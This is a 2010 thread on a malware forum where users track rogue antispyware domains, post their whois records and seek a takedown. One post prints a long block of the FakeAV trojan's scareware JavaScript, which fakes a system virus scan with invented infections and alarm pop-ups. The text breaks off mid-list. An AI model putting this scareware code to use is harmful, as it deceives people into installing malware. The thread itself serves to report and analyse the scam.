help to close down redsol.cn, traflab.cn and newcrawler.cn

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby merbit » Mon Mar 22, 2010 2:36 pm

I discovered a weird rogue antispyware scanner lately, but I didn't have any luck taking it down. I was searching (google search) to download the calibri fonts, when I stumbled upon this thread (and a list of threads cross-linked inside that one), that point to a malicious / rogue antispyware download:

http://forum.indya.com/showthread.php?t=166404
(safe to view, but don't follow the link inside!)

A link example is: hxxp://www.redsol.cn/fonts-calibri-download.html (unsafe to view)
(or hxxp://www.redsol.cn/anything-here.html )

After a lot of site redirections (that seem to end up in a random website), you end up with something like this example: http://yfrog.com/i3bad2cp (image on imageshack)

redsol.cn and traflab.cn:
$ whois redsol.cn
Domain Name: redsol.cn
ROID: 20090429s10001s67741052-cn
Domain Status: ok
Registrant Organization: TNT
Registrant Name: BanksRobert
Administrative Email: alexj4090@yahoo.com
Sponsoring Registrar: 厦门东南融通在线科技有限公司
Name Server:ns1.traflab.cn
Name Server:ns2.traflab.cn
Registration Date: 2009-04-29 19:45
Expiration Date: 2011-04-29 19:45

$ whois traflab.cn
Domain Name: traflab.cn
ROID: 20090318s10001s70083133-cn
Domain Status: ok
Registrant Organization: TNT
Registrant Name: BanksRobert
Administrative Email: alexj4090@yahoo.com
Sponsoring Registrar: 厦门东南融通在线科技有限公司
Name Server:ns1.traflab.cn
Name Server:ns2.traflab.cn
Registration Date: 2009-03-18 17:54
Expiration Date: 2011-03-18 17:54







Random versions of the program keep popping up, it would be great if someone knows how to end this.

Update:
newcrawler.cn is also part of the "scam":
$ whois newcrawler.cn
Domain Name: newcrawler.cn
ROID: 20091126s10001s09694541-cn
Domain Status: ok
Registrant Organization: SQT
Registrant Name: NeilRobert
Administrative Email: alexj4090@yahoo.com
Sponsoring Registrar: 厦门东南融通在线科技有限公司
Name Server:ns1.traflab.cn
Name Server:ns2.traflab.cn
Registration Date: 2009-11-26 06:53
Expiration Date: 2010-11-26 06:53


Useful links:
http://www.malwareurl.com/listing.php?domain=redsol.cn
http://www.malwareurl.com/ns_listing.ph ... 149.255.26
http://www.malwareurl.com/ns_listing.ph ... .159.99.76
Last edited by merbit on Mon Mar 22, 2010 3:02 pm, edited 1 time in total.
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn and traflab.cn

Postby merbit » Mon Mar 22, 2010 2:41 pm

Moreover, I tried to report the websites at phishtank, e.g.:
http://www.phishtank.com/phish_detail.p ... _id=939792

The problem seems to be that the site is sometimes "temporarily taken down" (not sure though), probably to avoid being reported.
merbit
Getting started
 
Posts: 10
Joined: Thu Jan 21, 2010 6:45 pm

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby spamislame » Mon Mar 22, 2010 3:39 pm

That is a doozie of a server.

Dependent on your input, you can end up at a few different locations, all of which attempt to plant malware.

Very scant whois information for either the redsol dot cn domain or its ip (66.197.154.230).

SiL
User avatar
spamislame
Site Admin
 
Posts: 5058
Joined: Tue May 09, 2006 9:18 am

Re: help to close down redsol.cn, traflab.cn and newcrawler.cn

Postby AlphaCentauri » Mon Mar 22, 2010 7:37 pm

Their leaching their favicon from Google, too.

thenewbornofclear-pc.in is the domain I see. It's trying to run javascript, but I have no idea what this does. It had no line breaks and messed up the forum, so I tried to insert some in logical places, which is pure hubris since I don't understand the logic. :(

Virus total identifies it as a FakeAV trojan:
http://www.virustotal.com/analisis/b87b ... 1269292903
Code: Select all
var snyoh={"yexzfo":false,"scbjwqa":false,"fucsqr":false,"oqimu":false,
"xwhnnp":false,"hbqgppbj":-1,"baicp":"<div class=\"centrallanding_main\">
<div class=\"centrallanding_left\" id=\"centrallanding_left\">
<div class=\"centrallanding_left_1\"><div class=\"left_icon_1\"><\/div>
<div class=\"centrallanding_spacer\">
<\/div><div class=\"centrallanding_top\">System Tasks<\/div>
<div class=\"centrallanding_bottom\"><\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">View system information<\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">Add or remove programs<\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">Change a settings<\/div><\/div>
<div class=\"centrallanding_left_1\"><div class=\"left_icon_2\"><\/div>
<div class=\"centrallanding_spacer\"><\/div>
<div class=\"centrallanding_top\">Other Places<\/div>
<div class=\"centrallanding_bottom\"><\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">My Network Places<\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">My Documents<\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">Shared Documents<\/div>
<div class=\"centrallanding_left_inner\" onclick=\"ejnovce.ffzaugutu();return false;
\">Control Panel<\/div>
<\/div>
<div class=\"centrallanding_left_1\">
<div class=\"centrallanding_spacer\"><\/div>
<div class=\"centrallanding_top\">Details<\/div>
<div class=\"centrallanding_bottom\"><\/div>
<strong>My Computer<\/strong><br\/>\nSystem Folder\n        <\/div><\/div>
<div class=\"centrallanding_right\"><div class=\"centrallanding_spacer\"><\/div>
<div class=\"centrallanding_right_1\">System folders<span id=\"centrallanding_right_1_alert\"><\/span><\/div>
<div class=\"centrallanding_grad\"><\/div>
<div class=\"centrallanding_folders\"><div class=\"centrallanding_folder_1\">
<b class=\"icon\"><\/b>\n                Shared Documents\n                <div class=\"centrallanding_virus_1\"
 id=\"centrallanding_virus_1\">
<b class=\"threat\"><\/b>
<span id=\"centrallanding_virus_1_number\"><\/span>&nbsp;
Viruses found<\/div><\/div>
<div class=\"centrallanding_folder_2\"><b class=\"icon\"><\/b>
\n                My Documents\n                <div class=\"centrallanding_virus_1\" id=\"centrallanding_virus_2\">
<b class=\"threat\"><\/b>
<span id=\"centrallanding_virus_2_number\"><\/span>&nbsp;
Viruses found<\/div><\/div><\/div>
<div class=\"centrallanding_spacer\"><\/div>
<div class=\"centrallanding_right_1\">Hard drive<span id=\"centrallanding_right_1_alert\"><\/span><\/div>
<div class=\"centrallanding_grad\"><\/div>
<div class=\"centrallanding_hdd_1\">
<b class=\"icon\">
<\/b>\n            Hard drive (C:)\n            <div class=\"centrallanding_virus_1\" id=\"centrallanding_virus_3\">
<b class=\"threat\"><\/b>
<span id=\"centrallanding_virus_3_number\"><\/span>&nbsp;
Viruses found<\/div><\/div>
<div class=\"centrallanding_right_1\">Security<span id=\"centrallanding_right_1_alert\"><\/span><\/div>
<div class=\"centrallanding_grad\"><\/div>
<div class=\"centrallanding_sec_1\" id=\"centrallanding_sec_1\">
<b class=\"icon\">
<\/b>\n            Windows Security\n            <div class=\"centrallanding_virus_2\"
 id=\"centrallanding_virus_2_1\">Security is affected by virus<\/div><\/div>
<div class=\"centrallanding_scroll\"><span id=\"centrallanding_scroll\">0<\/span><span>%<\/span>
<div class=\"centrallanding_scroll_bg\" id=\"centrallanding_scroll_bg\"><\/div><\/div>
<div class=\"centrallanding_progress\" id=\"centrallanding_progress_1\">
Checking: <span id=\"centrallanding_progress\">
<\/span><\/div>
<div class=\"centrallanding_table\" id=\"centrallanding_table\">
<div class=\"centrallanding_table_text\">Your Computer is infected<\/div><div class=\"centrallanding_spacer\"><\/div>
<table class=\"centrallanding_inner_table\" cellpadding=\"0\" cellspacing=\"0\"><tr class=\"centrallanding_table_tr_1\">
<td colspan=\"2\" width=\"260\">Name<\/td>
<td width=\"4\">
<b class=\"del\"><\/b><\/td>
<td width=\"75\">Type<\/td>
<td width=\"4\"><b class=\"del\"><\/b><\/td>
<td>Threat level<\/td><\/tr><\/table>
<div class=\"centrallanding_inner_table_cont\" id=\"centrallanding_inner_table_cont\">
<div class=\"centrallanding_spacer\"><\/div>
<table class=\"centrallanding_inner_table_2\" cellpadding=\"0\" cellspacing=\"0\"><\/table><\/div>
<div class=\"centrallanding_recommend\">
<strong>Recommend:<\/strong> Click \"Start Protection\" button to erase all threats<\/div>
<div class=\"centrallanding_start\">
<form style=\"padding:0;
 margin:0;
  font-family:tahoma;
 font-size:11px\"><input type=\"button\" style=\"padding:0;
 margin:0;
  font-family:tahoma;
 font-size:11px\" value=\"Start Protection\" width=\"104\" height=\"23\" onclick=\"ejnovce.ffzaugutu();
return false;
\"\/><\/form><\/div><\/div><\/div>
<div class=\"centrallanding_main_content\"><\/div><\/div>","attlpfrm":"@charset \"windows-1251\";
div#centralLandingCssTestElement{width:2px;}
div.backgroundOpacityLayer{display:none;}
body{margin:0;padding:0;width:100%;height:100%;}
html{height:100%;}
.centrallanding_main{width:100%;height:100%;font-family:tahoma;
font-size:1px;background:#fff;position:absolute;left:0;top:0;margin:0;}
img{border:none;}
.centrallanding_left{min-height:537px;height:100%;position:absolute;width:222px;background:#7190e0;z-index:1;}
.centrallanding_spacer{width:1px;height:1px;font-size:1px;}
.centrallanding_spacer15{width:1px;height:15px;font-size:1px;}
.centrallanding_spacer53{width:1px;height:53px;font-size:1px;}
.centrallanding_right{position:absolute;width:100%;min-width:572px;height:100%;margin-right:0;
min-height:537px;top:0;overflow:auto;}
.centrallanding_left_1 .left_icon_1,
.centrallanding_left_1 .left_icon_2,
.centrallanding_folder_1 b.icon,
.centrallanding_folder_2 b.icon,.centrallanding_hdd_1 b.icon,
.centrallanding_sec_1 b.icon,
.cl_win_main .about b,
.cl_infected_red b,
b.threat{display:block;font-size:0;line-height:0;
background-image:url(Layouts\/Landings\/CentralLandings\/7\/images\/list\/icon_sprite.jpg);
background-repeat:no-repeat;}
b.threat{width:13px;height:16px;background-position:0 -160px;}
.centrallanding_table,.centrallanding_scroll,
.cl_win_main .about,.centrallanding_left_1,
.cl_win_rightb,
.cl_win_foot .downcornerl,
.centrallanding_left_1 .centrallanding_top,
.centrallanding_left_1 .centrallanding_bottom,
.centrallanding_grad,
b.del,.yellow_border .cornerup,.yellow_border .cornerd,
.cl_win_foot .downcornerr{background-image:url(Layouts\/Landings\/CentralLandings\/7\/images\/list\/main_sprite.jpg);
background-repeat:no-repeat;}
b.del{display:block;width:4px;height:20px;background-position:-513px -44px;}
.cl_win_head .cornerr,
.cl_win_head .cornerl,
.cl_win_foot .downfon,.cl_win_head .fonup,.GridHead,.centrallanding_scroll_bg,
.centrallanding_table_tr_1 td{background-image:url(Layouts\/Landings\/CentralLandings\/7\/images\/list\/fill_sprite.gif);
background-repeat:no-repeat;}
.centrallanding_left_1{width:186px;background-position:-1457px 0;
background-repeat:repeat-y;position:relative;margin-top:7px;margin-left:6px;
font-size:11px;padding-top:28px;
padding-bottom:13px;
padding-left:10px;
line-height:1.4;
padding-right:10px;margin-top:15px;}
.centrallanding_left_1 .left_icon_1{width:16px;height:64px;
position:absolute;top:35px;left:13px;background-position:0 0;}
.centrallanding_left_1 .left_icon_2
{width:16px;height:88px;position:absolute;top:35px;left:13px;background-position:0 -72px;}
.centrallanding_left_1
.centrallanding_top{position:absolute;left:0;top:0;background-position:-528px -20px;
height:19px;width:192px;font-size:11px;font-weight:bold;font-family:tahoma;color:#345ab8;
padding-left:14px;padding-top:4px;}
.centrallanding_left_1 .centrallanding_bottom
{position:absolute;left:0;bottom:0;background-position:-734px -20px;height:2px;width:206px;font-size:1px;}
.centrallanding_left_inner{position:relative;font-size:11px;font-family:tahoma;
color:#345ab8;padding-left:24px;height:17px;padding-top:1px;cursor:pointer;margin-top:6px;width:150px;}
.centrallanding_left_inner img{position:absolute;left:0;top:0;}
.centrallanding_right_1{position:relative;margin-left:240px;margin-top:10px;font-size:11px;font-weight:bold;}
.centrallanding_right_1 span{color:#e20101;}
.centrallanding_grad{width:329px;height:1px;line-height:0;font-size:0;overflow:hidden;
margin-top:5px;margin-left:225px;background-position:-513px -43px;}
.centrallanding_folders{overflow:hidden;zoom:1;}
.centrallanding_folder_1{width:130px;height:38px;padding-left:45px;
padding-top:10px;font-size:11px;left:250px;margin-top:15px;
position:relative;float:left;}
.centrallanding_virus_1{height:16px;padding-left:20px;margin-top:5px;
font-size:11px;font-weight:bold;color:#de0000;padding-top:2px;visibility:hidden;position:relative;}
.centrallanding_virus_1 b{top:0;left:0;position:absolute;}
.centrallanding_folder_2{width:140px;height:38px;padding-left:45px;padding-top:10px;font-size:11px;left:320px;
margin-top:15px;position:relative;float:left;}
.centrallanding_folder_1 b.icon,
.centrallanding_folder_2 b.icon{width:37px;height:36px;background-position:-16px 0;position:absolute;top:0;left:0;}
.centrallanding_hdd_1{width:150px;height:38px;padding-left:55px;padding-top:5px;font-size:11px;
margin-left:245px;margin-top:10px;position:relative;}
.centrallanding_hdd_1 b.icon{width:48px;height:26px;background-position:-16px -36px;position:absolute;top:0;left:0;}
.centrallanding_sec_1{width:250px;height:38px;padding-left:55px;padding-top:10px;
font-size:11px;margin-left:245px;margin-top:10px;position:relative;}
.centrallanding_sec_1 b.icon{width:39px;height:48px;background-position:-16px -62px;position:absolute;top:0;left:0;}
.centrallanding_virus_2{height:14px;margin-top:5px;font-size:11px;font-weight:bold;
color:#de0000;padding-top:2px;visibility:hidden;}
.centrallanding_scroll{width:253px;height:17px;font-size:12px;font-weight:bold;background-position:-513px 0;
margin-top:15px;margin-left:240px;padding-top:3px;padding-left:260px;position:relative;}
.centrallanding_scroll span{position:relative;z-index:1;}
.centrallanding_scroll_bg{position:absolute;left:5px;top:3px;
width:0;height:15px;background-position:0 -111px;
background-repeat:repeat-x;z-index:0;}
.centrallanding_table{width:513px;height:211px;
background-position:0 0;position:relative;margin-top:15px;margin-left:240px;visibility:hidden;}
.centrallanding_progress{margin-left:245px;font-size:11px;color:#4b4b4b;margin-top:2px;}
.centrallanding_inner_table{width:480px;margin-left:15px;margin-top:48px;}
.centrallanding_table_tr_1 td{background-position:0 -126px;background-repeat:repeat-x;
font-family:verdana;font-size:11px;padding-left:8px;}
.centrallanding_inner_table_cont{width:480px;margin-left:15px;height:97px;overflow:auto;}
.centrallanding_inner_table_2 td{height:18px;padding-left:5px;font-size:11px;}
.centrallanding_table_text{font-size:16px;color:#FFF;position:absolute;left:43px;top:8px;}
.centrallanding_recommend{position:absolute;left:18px;bottom:15px;font-size:11px;cursor:pointer;}
.centrallanding_start{position:absolute;right:15px;bottom:10px;cursor:pointer;}
.centrallanding_left_border{height:100%;position:absolute;z-index:3;width:3px;background:#0731d9;left:0;top:0;}
.centrallanding_right_border{height:100%;position:absolute;z-index:3;width:3px;font-size:1px;background:#0731d9;
right:0;top:0;}
.centrallanding_bottom_border{width:100%;position:absolute;z-index:3;height:3px;
font-size:1px;background:#0731d9;left:0;bottom:0;}
.centrallanding_main_content{width:800px;height:600px;position:relative;}
.centrallanding_table_divider
{background:url(Layouts\/Landings\/CentralLandings\/6\/images\/list\/table_divider.gif);}
#divider1{width:4px;height:20px;background-position:0 0;}
#divider2{width:4px;height:20px;background-position:0 0;}
#cl_alert{font-family:tahoma;}
#cl_main{width:436px;height:350px;background-position:0 -20px;position:relative;}
.close{width:25px;height:25px;position:absolute;top:0;right:0;cursor:pointer;}
.move{width:410px;height:25px;position:absolute;top:0;left:0;}
.spacer{width:1px;height:1px;font-size:1px;}
.text1{position:relative;margin-top:50px;margin-left:60px;
width:355px;font-family:Verdana,Geneva,sans-serif;font-size:11px;font-weight:bold;color:#FFF;}
.cl_viruses{width:410px;position:absolute;height:103px;top:135px;left:11px;overflow:auto;}
.virus{float:left;width:280px;padding-left:5px;font-family:Tahoma,Geneva,sans-serif;
font-size:11px;color:#F00;font-weight:bold;}
.virusname{font-size:11px;}.text2{bottom:10px;left:50px;width:365px;font-size:11px;
font-family:Tahoma,Geneva,sans-serif;position:absolute;}
.remove{position:absolute;left:220px;top:250px;width:93px;height:22px;cursor:pointer;}
.cancel{position:absolute;left:332px;top:250px;width:93px;height:22px;cursor:pointer;}
.virus_1_1{padding-left:18px;position:relative;height:17px;padding-top:3px;font-size:11px;font-family:tahoma;}
.cl_alert{width:436px;height:350px;margin-left:auto;margin-right:auto;}",
"pcuar":[{"path":"Layouts\/Landings\/CentralLandings\/7\/images\/list\/fill_sprite.gif","width":30,"height":146},
{"path":"Layouts\/Landings\/CentralLandings\/7\/images\/list\/icon_sprite.jpg",
"width":64,"height":180},{"path":"Layouts\/Landings\/CentralLandings\/7\/images\/list\/main_sprite.jpg",
"width":1667,"height":211},
{"path":"Layouts\/Landings\/CentralLandings\/7\/images\/list\/table_divider.gif","width":436,"height":370}],
"sdwgdumkl":"<div id=\"cl_alert\" style=\"display:none\">
<div id=\"cl_main\" class=\"centrallanding_table_divider\">
<div class=\"close\" onclick=\"ejnovce.vljjaf.vzafgni('cl_alert');
ejnovce.sewikzgsw.yxityy();\"><\/div>
<div class=\"move\" onmousedown=\"ejnovce.vljjaf.nnfshhj (event);\"><\/div><div class=\"spacer\"><\/div>
<div class=\"text1\">To help protect your computer, Windows Web Security have detected Trojans
and ready to remove them.<\/div>
<div class=\"cl_viruses\"><div class=\"virus\" id= \"viruses\"><\/div>
<div class=\"virusname\" id= \"hazardType\"><\/div><\/div>
<div class=\"text2\">Spyware is software, which can gather information from user's computer throught
Internet connection and send them to its creater.
Gather information can be passwords, e-mail adresses and all that data,
 which is important for you.<\/div>
<div class=\"remove\" onclick=\"ejnovce.vljjaf.vzafgni ('cl_alert');
ejnovce.ffzaugutu();return false;\"><\/div><div class=\"cancel\" onclick=\"ejnovce.vljjaf.vzafgni ('cl_alert');
 ejnovce.ffzaugutu();return false;\"><\/div><\/div><\/div>",
"nlbdi":"var $delay=30;var $x=0;var $t=0;var $t1=0;
var $count=Math.floor(Math.random()*4)+9;var $count1=Math.floor(Math.random()*($count-3))+3;
var $inner2=\"\";
var $inner=[];$items=Math.floor(504\/$count);
var virusArrayLength=vsyzucfgj.mcdpyfqwg.czqooslgu.length;shuffle=function(d)
{for(var b,a,c=d.length;c;b=parseInt(Math.random()*c),a=d[--c],d[c]=d[b],d[b]=a){}return d};
var $virus=shuffle(vsyzucfgj.mcdpyfqwg.czqooslgu);
var $files=shuffle(vsyzucfgj.ybsdihnqdy.jimndkxx);
for($i=0;$i<$count;$i++){$inner[$i]='<tr><td>
<b class=\"threat\"><\/b><\/td>
<td width=\"285\"><strong>'+$virus[$i][0]+'<\/strong><\/td>
<td width=\"90\">Virus<\/td>
<td><strong><font color=#ff0000>'+$virus[$i][1]+\"<\/font><\/strong><\/td><\/tr>\";document.getElementById(\"viruses\")
.innerHTML+='<div class=\"virus_1_1\"><b class=\"threat\" style = \"position:absolute;
 left:0px; top:2px\"><\/b>'+$virus[$i][0]+\"<\/div>\";document.getElementById(\"hazardType\")
.innerHTML+='<div class=\"virus_1_1\">'+$files[$i]+\"<\/div>\"}function shieldBlink()
{if(document.getElementById(\"centrallanding_sec_1\")
.style.backgroundPosition==\"0px -518px\"){document.getElementById(\"centrallanding_sec_1\")
.style.backgroundPosition=\"0px -566px\"}else{document.getElementById(\"centrallanding_sec_1\")
.style.backgroundPosition=\"0px -518px\"}setTimeout(function(){shieldBlink()},500)}function blink1(){if(document.getElementById(\"centrallanding_virus_1\")
.style.visibility==\"visible\")
{document.getElementById(\"centrallanding_virus_1\").style.visibility=\"hidden\"}
else{document.getElementById(\"centrallanding_virus_1\")
.style.visibility=\"visible\"}
if(document.getElementById(\"centrallanding_virus_3\")
.style.visibility==\"visible\")
{document.getElementById(\"centrallanding_virus_3\").style.visibility=\"hidden\"}
else{document.getElementById(\"centrallanding_virus_3\")
.style.visibility=\"visible\"}setTimeout(function(){blink1()},500)}function blink2()
{if(document.getElementById(\"centrallanding_virus_2\")
.style.visibility==\"visible\")
{document.getElementById(\"centrallanding_virus_2\").style.visibility=\"hidden\"}
else{document.getElementById(\"centrallanding_virus_2\")
.style.visibility=\"visible\"}setTimeout(function(){blink2()},500)}
function startCentral(){$x+=2;
document.getElementById(\"centrallanding_scroll_bg\")
.style.width=$x+\"px\";
document.getElementById(\"centrallanding_scroll\")
.innerHTML=Math.floor($x\/5);document.getElementById(\"centrallanding_progress\")
.innerHTML=vsyzucfgj.ybsdihnqdy.waaixkh[Math.floor(Math.random()*7)]
+vsyzucfgj.ybsdihnqdy.jimndkxx[Math.floor(Math.random()*60)];
if($x%($items)==0)
{$t++;if($t==1){blink1()}document.getElementById(\"centrallanding_table\")
.style.visibility=\"visible\";
document.getElementById(\"centrallanding_virus_3_number\")
.innerHTML=$t;if($t<=$count1){document.getElementById(\"centrallanding_virus_1_number\")
.innerHTML=$t}else{$t1++}if($t1==1){blink2()}if($t1>0)
{document.getElementById(\"centrallanding_virus_2_number\")
.innerHTML=$t1}$inner2+=$inner[$t-1];$inner1='<div class=\"centrallanding_spacer\"><\/div>
<table class=\"centrallanding_inner_table_2\" cellpadding=\"0\" cellspacing=\"0\">'+$inner2+\"<\/table>\";
document.getElementById(\"centrallanding_inner_table_cont\").innerHTML=$inner1}if($x<504){setTimeout(function(){startCentral()},$delay)}else{document.getElementById(\"centrallanding_virus_2_1\")
.style.visibility=\"visible\";shieldBlink();
setTimeout(function(){ejnovce.vljjaf.dfdxkuv(\"cl_alert\",439,463)},1000)}}startCentral();
","pgoujpi":false,"gshqo":[["To prevent damage to your computer, press CANCEL.","C"],
["Your system is at risk of crash. Press CANCEL to prevent it.","C"],
["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.",
"O"],["To improve performance of your PC press 'OK'.","O"],
["Your PC is working slowly. Press 'OK' to check it.","O"]],
"qylup":false,"ixodo":true,"vlnlxevh":true,"pdibx":true,
"gwiaif":false,"julhrmn":{"gmshzygcd":"7","lqqtxmpri":"319"}};
var vsyzucfgj={icditqzke:{},mcdpyfqwg:{},ybsdihnqdy:{}};vsyzucfgj.icditqzke.tfbayo=["C:\\Windows\\",
"C:\\Windows\\Temp\\","C:\\Windows\\System32\\",
"C:\\Windows\\System\\",
"C:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\",
"C:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\",
"C:\\..\\Default User\\Application Data\\",
"C:\\..\\Default User\\Application Data\\Microsoft\\",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.MSO\\",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\02JOYYKN",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\4TKU9OZ3",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\90VG10YE",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\NZCSLLPE",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\02JOYYKN\\",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\4TKU9OZ3\\",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\90VG10YE\\",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\NZCSLLPE\\",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\JZX45EKR\\",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\LOOEGBIU\\"];
vsyzucfgj.mcdpyfqwg.tfbayo=["C:\\Windows\\cleansweep.exe",
"C:\\Windows\\msls51.dll",
"C:\\Windows\\Temp\\msls51.tmp",
"C:\\Windows\\Temp\\runddlkey.dll",
"C:\\Windows\\System32\\regp.exe",
"C:\\Windows\\System32\\secureit.com",
"C:\\Windows\\System\\spoos.exe",
"C:\\Windows\\System\\winscent.exe",
"C:\\Windows\\mcd32.dll",
"C:\\Windows\\Temp\\energy.tmp",
"C:\\Windows\\Temp\\edit.hlp",
"C:\\Windows\\System32\\SysShield.exe",
"C:\\Windows\\System32\\delInstav2009.bat",
"C:\\Windows\\System\\AMC.exe",
"C:\\Windows\\System\\PAM.exe",
"C:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\warning.mht",
"C:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\svo.scf",
"C:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\winlogon32.exe",
"C:\\..\\Default User\\Application Data\\helpers32.dll",
"C:\\..\\Default User\\Application Data\\FlashUtil10c.exe",
"C:\\..\\Default User\\Application Data\\Microsoft\\smss32.exe",
"C:\\..\\Default User\\Application Data\\Microsoft\\warnings.html",
"C:\\..\\NTUSER.DAT",
"C:\\..\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\02JOYYKN\\41.exe",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\4TKU9OZ3\\mozcrt19.dll",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\90VG10YE\\sqlite3.dll",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\NZCSLLPE\\tjd.tmp",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\JZX45EKR\\57634hzcktool3d59.bin",
"C:\\..\\User\\Local Settings\\Temporary Internet Files\\Content.IE5\\LOOEGBIU\\10190wormz5e.dll",
"C:\\Downloads\\Desktop.ini",
"C:\\Downloads\\mfc70fra.dll",
"C:\\RECYCLER\\57939tzoj5fc.bin","C:\\RECYCLER\\10133zo9m49d5.cpl",
"C:\\RECYCLER\\pav.exe",
"C:\\System Volume Information\\phook.dll",
"C:\\System Volume Information\\2z55vir2951.ocx"];vsyzucfgj.ybsdihnqdy.waaixkh=["C:\\Windows\\",
"C:\\..\\LocalService\\Local Settings\\Temporary Internet Files\\",
"C:\\..\\Local Settings\\Temporary Internet Files\\Content.IE5\\",
"C:\\..\\Default User\\Application Data\\",
"C:\\..\\Default User\\Application Data\\Microsoft\\",
"C:\\Documents and Settings\\All Users\\Application Data\\",
"C:\\Documents and Settings\\Default User\\Application Data\\",
"C:\\Documents and Settings\\Default User\\Local Settings\\",
"C:\\Downloads\\","C:\\RECYCLER\\",
"C:\\System Volume Information\\"];vsyzucfgj.ybsdihnqdy.jimndkxx=["0.log","_default.pif","Active Setup Log.txt",
"10247not-5-vi9us2zd.dll","ALCWZRD.EXE",
"always.bat","bootstat.dat","cdplayer.ini","clock.avi","cmsetacl.log",
"comsetup.log","control.ini","corelpf.lrs","desktop.ini","DirectX.log",
"DtcInstall.log","10399zroj555.cpl","erg_film.ini","explorer.exe",
"explorer.scf","FaxSetup.log","FinishDrv.log","FontData.fdb",
"2z593spy3505.dll","FSISU.log","FSPROD.log","FSSFM.log",
"10z7worm559.ocx","2z5dow9loader222.exe","activeds.tlb",
"ahui.exe","apphelp.dll","appmgmts.dll","appmgr.dll","atmadm.exe",
"main_config.xml","bootcfg.exe","bthprops.cpl","uninstall.exe",
"c_28592.nls","catsrvps.dll","cidaemon.exe","cmmgr32.hlp",
"commdlg.dll","cryptdll.dll","2z5dow9loader222.exe","d3dx10_37.dll",
"defrag.exe","dhcpcsvc.dll","dmadmin.exe","docprop2.dll","dpvacm.dll",
"dsound3d.dll","edit.hlp","dbsinit.exe","forcedos.exe","wispex.html",
"hotplug.dll","icfgnt5.dll","igfxrell.lrc","kbdhe220.dll","kbdpl1.dll",
"KGyGaAvL.sys","loadperf.dll","mcd32.dll","Thumbs.db","nuar.old",
"msacm32.dll","alg.exe","arp.exe","atmfd.dll","adc32.dll",
"avicap32.dll","calc.exe","camocx.dll","explorer.exe","hh.exe",
"HideWin.exe","IsUninst.exe","alggui.exe","MicCal.exe",
"NOTEPAD.EXE","regedit.exe","TASKMAN.EXE","twunk_16.exe",
"twunk_32.exe","winhelp.exe","winhlp32.exe","x2.64.exe","twain.dll",
"twain_32.dll","vmmreg32.dll","bootstat.dat","d3dx.dat","nsreg.dat",
"popcinfo.dat","SET3.tmp","SET4.tmp","SET8.tmp","iexplore.exe",
"actmovie.exe","ahui.exe","winspool.exe","winver.exe","WISPTIS.EXE",
"wowdeb.exe","wowexec.exe","wpabaln.exe","wpnpinst.exe","write.exe",
"wscntfy.exe","wscript.exe","wuauclt.exe","wuauclt1.exe",
"wupdmgr.exe","cic.dll","ciodm.dll","clb.dll","clbcatex.dll","clbcatq.dll","cliconfg.dll",
"cygwin1.dll","cygz.dll","d3d8.dll","d3d8thk.dll","d3d9.dll","drmclien.dll
","drmstor.dll","drmv2clt.dll","drprov.dll","ds16gt.dLL","ds32gt.dll",
"dsauth.dll","dsdmo.dll","ieakeng.dll","ieaksie.dll","ieakui.dll",
"ieapfltr.dll","iedkcs32.dll","ieencode.dll","ieframe.dll","listing.cfg",
"iernonce.dll","iertutil.dll","iesetup.dll","ieui.dll","kerberos.dll",
"kernel32.dll","settings.ini","ksuser.dll","kwutil2k.dll","sti_ci.dll",
"stobject.dll","storage.dll","storprop.dll","times.conf","strmdll.dll",
"strmfilt.dll","sk.lst","swprv.dll","securitycenter.exe","untfs.dll",
"taskmgr.dll","upnphost.dll","upnpui.dll","vlc.dat","pthreadVC2.dll",
"urlmon.dll","usbmon.dll","usbui.dll","gedx_ae09.exe","dssec.dat",
"emptyregdb.dat","ezsidmv.dat","FNTCACHE.DAT","ieapfltr.dat",
"imon1.dat","msvcr71.dll","noise.dat","oembios.dat","jkfuckjs.exe",
"perfc019.dat","WMILib.dll","perfd019.dat","perfh009.dat",
"msvcp71.dll","perfi009.dat","perfi019.dat","secupd.dat","ansi.sys",
"country.sys","himem.sys","kgn.exe","keyboard.sys","ntdos.sys",
"kn.a.exe","ntdos411.sys","guide.chm","ntdos804.sys","ntio.sys",
"hjengine.dll","ntio411.sys","ntio412.sys","MFC71ENU.DLL",
